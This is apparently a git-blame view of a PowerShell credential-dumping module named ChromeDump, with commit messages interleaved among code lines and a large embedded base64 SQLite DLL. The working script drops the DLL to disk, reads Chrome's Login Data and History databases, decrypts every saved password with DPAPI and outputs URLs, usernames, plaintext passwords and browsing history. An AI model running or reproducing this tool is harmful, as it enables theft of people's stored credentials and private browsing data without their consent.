4QAAAAAADPSSYvFSSvGSPf1SI1wAUiD/gh3Kk2LzEyLxUmL1UmLzuh6/v//SYPvAQ+IAgIAAE6LdPwwTous/CACAADrwU
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`}`
			`else`
			`{`
			`#32 bit version`
Fix for error when loading SQLite assembly 2016-06-09 13:35:28 +00:00			$assembly = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABt8sxbKZOiCCmToggpk6IIIOsmCDWToggg6zcIFZOiCCDrIQhCk6IIDlXZCC6Toggpk6MIoZOiCCDrKQgrk6IIIOswCCiTogg3wTYIKJOiCCDrMwgok6IIUmljaCmToggAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEFAGZJFlcAAAAAAAAAAOAAAiELAQkAAIoOAAB6BQAAAAAAkJkOAAAQAAAAoA4AAAAAEAAQAAAAAgAABQAAAAEAAAAFAAAAAAAAAABgFAAABAAACs0UAAIAQAEAABAAABAAAAAAEAAAEAAAAAAAABAAAAAgXBMAZCYAAHxQEwBQAAAAAOATAAwIAAAAAAAAAAAAAAAAAAAAAAAAAPATAIBcAABAog4AHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgEABAAAAAAAAAAAAAAAAAoA4ACAIAAAAAAAAAAAAAOJ0PAEgAAAAAAAAAAAAAAC50ZXh0AAAAlokOAAAQAAAAig4AAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAITiBAAAoA4AAOQEAACODgAAAAAAAAAAAAAAAABAAABALmRhdGEAAACETgAAAJATAAAmAAAAchMAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAADAgAAADgEwAACgAAAJgTAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAALplAAAA8BMAAGYAAACiEwAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8lQKEOEP8lOKEOEP8lNKEOEP8lMKEOEP8lLKEOEP8lKKEOEP8lJKEOEP8lIKEOEP8loKAOEP8lKKAOEP8lLKAOEP8lMKAOEP8lNKAOEP8lOKAOEP8lPKAOEP8lQKAOEP8lRKAOEP8lSKAOEP8lTKAOEP8lUKAOEP8lVKAOEP8lWKAOEP8lXKAOEP8lYKAOEP8lZKAOEP8laKAOEP8lbKAOEP8lcKAOEP8ldKAOEP8lfKAOEP8lgKAOEP8lhKAOEP8liKAOEP8ljKAOEP8lkKAOEP8lmKAOEP8lnKAOEP8lPKEOEP8lpKAOEP8lqKAOEP8lrKAOEP8lsKAOEP8ltKAOEP8luKAOEP8lvKAOEP8lwKAOEP8lxKAOEP8lyKAOEP8l0KAOEP8l1KAOEP8l2KAOEP8l3KAOEP8l4KAOEP8l5KAOEP8l6KAOEP8l9KAOEP8l+KAOEP8l/KAOEP8lAKEOEP8lBKEOEP8lCKEOEP8lDKEOEP8lEKEOEP8lFKEOEP8lGKEOEDsNcJETEHUC88PpWxcAAMzMzMzMzMzMzMzMVYvsV1aLdQyLTRCLfQiLwYvRA8Y7/nYIO/gPgqQBAACB+QABAAByH4M9fN4TEAB0FldWg+cPg+YPO/5eX3UIXl9d6ZYYAAD3xwMAAAB1FcHpAoPiA4P5CHIq86X/JJUUEwAQkIvHugMAAACD6QRyDIPgAwPI/ySFKBIAEP8kjSQTABCQ/ySNqBIAEJA4EgAQZBIAEIgSABAj0YoGiAeKRgGIRwGKRgLB6QKIRwKDxgODxwOD+QhyzPOl/ySVFBMAEI1JACPRigaIB4pGAcHpAohHAYPGAoPHAoP5CHKm86X/JJUUEwAQkCPRigaIB4PGAcHpAoPHAYP5CHKI86X/JJUUEwAQjUkACxMAEPgSABDwEgAQ6BIAEOASABDYEgAQ0BIAEMgSABCLRI7kiUSP5ItEjuiJRI/oi0SO7IlEj+yLRI7wiUSP8ItEjvSJRI/0i0SO+IlEj/iLRI78iUSP/I0EjQAAAAAD8AP4/ySVFBMAEIv/JBMAECwTABA4EwAQTBMAEItFCF5fycOQigaIB4tFCF5fycOQigaIB4pGAYhHAYtFCF5fycONSQCKBogHikYBiEcBikYCiEcCi0UIXl/Jw5CNdDH8jXw5/PfHAwAAAHUkwekCg+IDg/kIcg3986X8/ySVsBQAEIv/99n/JI1gFAAQjUkAi8e6AwAAAIP5BHIMg+ADK8j/JIW0EwAQ/ySNsBQAEJDEEwAQ6BMAEBAUABCKRgMj0YhHA4PuAcHpAoPvAYP5CHKy/fOl/P8klbAUABCNSQCKRgMj0YhHA4pGAsHpAohHAoPuAoPvAoP5CHKI/fOl/P8klbAUABCQikYDI9GIRwOKRgKIRwKKRgHB6QKIRwGD7gOD7wOD+QgPglb////986X8/ySVsBQAEI1JAGQUABBsFAAQdBQAEHwUABCEFAAQjBQAEJQUABCnFAAQi0SOHIlEjxyLRI4YiUSPGItEjhSJRI8Ui0SOEIlEjxCLRI4MiUSPDItEjgiJRI8Ii0SOBIlEjwSNBI0AAAAAA/AD+P8klbAUABCL/8AUABDIFAAQ2BQAEOwUABCLRQheX8nDkIpGA4hHA4tFCF5fycONSQCKRgOIRwOKRgKIRwKLRQheX8nDkIpGA4hHA4pGAohHAopGAYhHAYtFCF5fycOL/1WL7FGDZfwAU4tdEIXbdQczwOmaAAAAV4P7BHJ1jXv8hf92botNDItFCIoQg8AEg8EEhNJ0UjpR/HVNilD9hNJ0PDpR/XU3ilD+hNJ0JjpR/nUhilD/hNJ0EDpR/3ULg0X8BDl9/HLC6z8PtkD/D7ZJ/+tGD7ZA/g+2Sf7rPA+2QP0Ptkn96zIPtkD8D7ZJ/Osoi00Mi0UI6w+KEITSdBQ6EXUQQEH/Rfw5Xfxy7DPAX1vJww+2AA+2CSvB6/LMzMzMzMzMzMzMzIM9dN4TEAAPhAYZAACD7AgPrlwkBItEJAQlgB8AAD2AHwAAdQ/ZPCRmiwQkZoPgf2aD+H+NZCQID4XVGAAA6wDzD35EJARmDygVcKIOEGYPKMhmDyj4Zg9z0DRmD37AZg9UBZCiDhBmD/rQZg/TyqkACAAAdEw9/wsAAHx9Zg/zyj0yDAAAfwtmD9ZMJATdRCQEw2YPLv97JLrsAwAAg+wQiVQkDIvUg8IUiVQkCIlUJASJFCTolRUAAIPEEN1EJATD8w9+RCQEZg/zymYPKNhmD8LBBj3/AwAAfCU9MgQAAH+wZg9UBWCiDhDyD1jIZg/WTCQE3UQkBMPdBaCiDhDDZg/CHYCiDhAGZg9UHWCiDhBmD9ZcJATdRCQEw2oMaFBNExDo2yUAAIt1CIX2dHWDPXDeExADdUNqBOjLGgAAWYNl/ABW6PMaAABZiUXkhcB0CVZQ6BQbAABZWcdF/P7////oCwAAAIN95AB1N/91COsKagTotxkAAFnDVmoA/zWguBMQ/xVAoA4QhcB1Fuj3BgAAi/D/FbygDhBQ6KcGAACJBlnonyUAAMOL/1WL7FGDZfwAVo1F/FD/dQz/dQjoJycAAIvwg8QMhfZ1GDlF/HQT6LMGAACFwHQK6KoGAACLTfyJCIvGXsnDzMzMzMyL/1aL8jvBdBeF9nQTU4v/ihmKEIgYTogRQEGF9nXxW17DzMzMzMzMzMzMzMzMzM
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00
			`}`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`#Unable to load this assembly from memory. The assembly was most likely not compiled using /clr:safe and contains unmanaged code. Loading assemblies of this type from memory will not work. Therefore we have to load it from disk.`
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`#DLL for sqlite queries and parsing`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`#http://system.data.sqlite.org/index.html/doc/trunk/www/downloads.wiki`
			`Write-Verbose "[+]System.Data.SQLite.dll will be written to disk"`

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00
			`$content = [System.Convert]::FromBase64String($assembly)`

Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`$assemblyPath = "$($env:LOCALAPPDATA)\System.Data.SQLite.dll"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00
			`if(Test-path $assemblyPath)`
			`{`
			`try`
			`{`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`Add-Type -Path $assemblyPath`
			`}`
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`catch`
			`{`
			`Write-Warning "[!]Unable to load SQLite assembly"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`break`
			`}`
			`}`
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`else`
			`{`
			`[System.IO.File]::WriteAllBytes($assemblyPath,$content)`
			`Write-Verbose "[+]Assembly for SQLite written to $assemblyPath"`
			`try`
			`{`
			`Add-Type -Path $assemblyPath`
			`}`
			`catch`
			`{`
			`Write-Warning "[!]Unable to load SQLite assembly"`
			`break`
			`}`
			`}`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00
			`#Check if Chrome is running. The data files are locked while Chrome is running`

			`if(Get-Process \| Where-Object {$_.Name -like "chrome"}){`
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`Write-Warning "[!]Cannot parse Data files while chrome is running"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`break`
			`}`

			`#grab the path to Chrome user data`
			`$OS = [environment]::OSVersion.Version`
			`if($OS.Major -ge 6){`
			`$chromepath = "$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default"`
			`}`
			`else{`
			`$chromepath = "$($env:HOMEDRIVE)\$($env:HOMEPATH)\Local Settings\Application Data\Google\Chrome\User Data\Default"`
			`}`

			`if(!(Test-path $chromepath)){`
			`Throw "Chrome user data directory does not exist"`
			`}`
			`else{`
			`#DB for CC and other info`
			`if(Test-Path -Path "$chromepath\Web Data"){$WebDatadb = "$chromepath\Web Data"}`
			`#DB for passwords`
			`if(Test-Path -Path "$chromepath\Login Data"){$loginDatadb = "$chromepath\Login Data"}`
			`#DB for history`
			`if(Test-Path -Path "$chromepath\History"){$historydb = "$chromepath\History"}`
			`#$cookiesdb = "$chromepath\Cookies"`

			`}`

			`if(!($NoPasswords)){`

			`#Parse the login data DB`
Fix for error when loading SQLite assembly 2016-06-09 13:35:28 +00:00			`$connStr = "Data Source=$loginDatadb; Version=3;"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00
			`$connection = New-Object System.Data.SQLite.SQLiteConnection($connStr)`

			`$OpenConnection = $connection.OpenAndReturn()`

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`Write-Verbose "Opened DB file $loginDatadb"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00
			`$query = "SELECT * FROM logins;"`

			`$dataset = New-Object System.Data.DataSet`

			`$dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter($query,$OpenConnection)`

			`[void]$dataAdapter.fill($dataset)`

			`$logins = @()`

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`Write-Verbose "Parsing results of query $query"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00
			`$dataset.Tables \| Select-Object -ExpandProperty Rows \| ForEach-Object {`
			`$encryptedBytes = $_.password_value`
			`$username = $_.username_value`
			`$url = $_.action_url`
			`$decryptedBytes = [Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser)`
			`$plaintext = [System.Text.Encoding]::ASCII.GetString($decryptedBytes)`
			`$login = New-Object PSObject -Property @{`
			`URL = $url`
			`PWD = $plaintext`
			`User = $username`
			`}`

			`$logins += $login`
			`}`
			`}`

			`#Parse the History DB`
			`$connString = "Data Source=$historydb; Version=3;"`

			`$connection = New-Object System.Data.SQLite.SQLiteConnection($connString)`

			`$Open = $connection.OpenAndReturn()`

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`Write-Verbose "Opened DB file $historydb"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00
			`$DataSet = New-Object System.Data.DataSet`

			`$query = "SELECT * FROM urls;"`

			`$dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter($query,$Open)`

			`[void]$dataAdapter.fill($DataSet)`

			`$History = @()`
			`$dataset.Tables \| Select-Object -ExpandProperty Rows \| ForEach-Object {`
			`$HistoryInfo = New-Object PSObject -Property @{`
			`Title = $_.title`
			`URL = $_.url`
			`}`
			`$History += $HistoryInfo`
			`}`

			`if(!($OutFile)){`
			"[*]CHROME PASSWORDS`n"
			`$logins \| Format-Table URL,User,PWD -AutoSize \| Out-String`

			"[*]CHROME HISTORY`n"

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`$History \| Format-List Title,URL \| Out-String`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`}`
			`else {`
			"[*]LOGINS`n" \| Out-File $OutFile
			`$logins \| Out-File $OutFile -Append`

			"[*]HISTORY`n" \| Out-File $OutFile -Append
			`$History \| Out-File $OutFile -Append`

			`}`

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00
			`Write-Warning "[!] Please remove SQLite assembly from here: $assemblyPath"`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00


Fix for error when loading SQLite assembly 2016-06-09 13:35:28 +00:00			`}`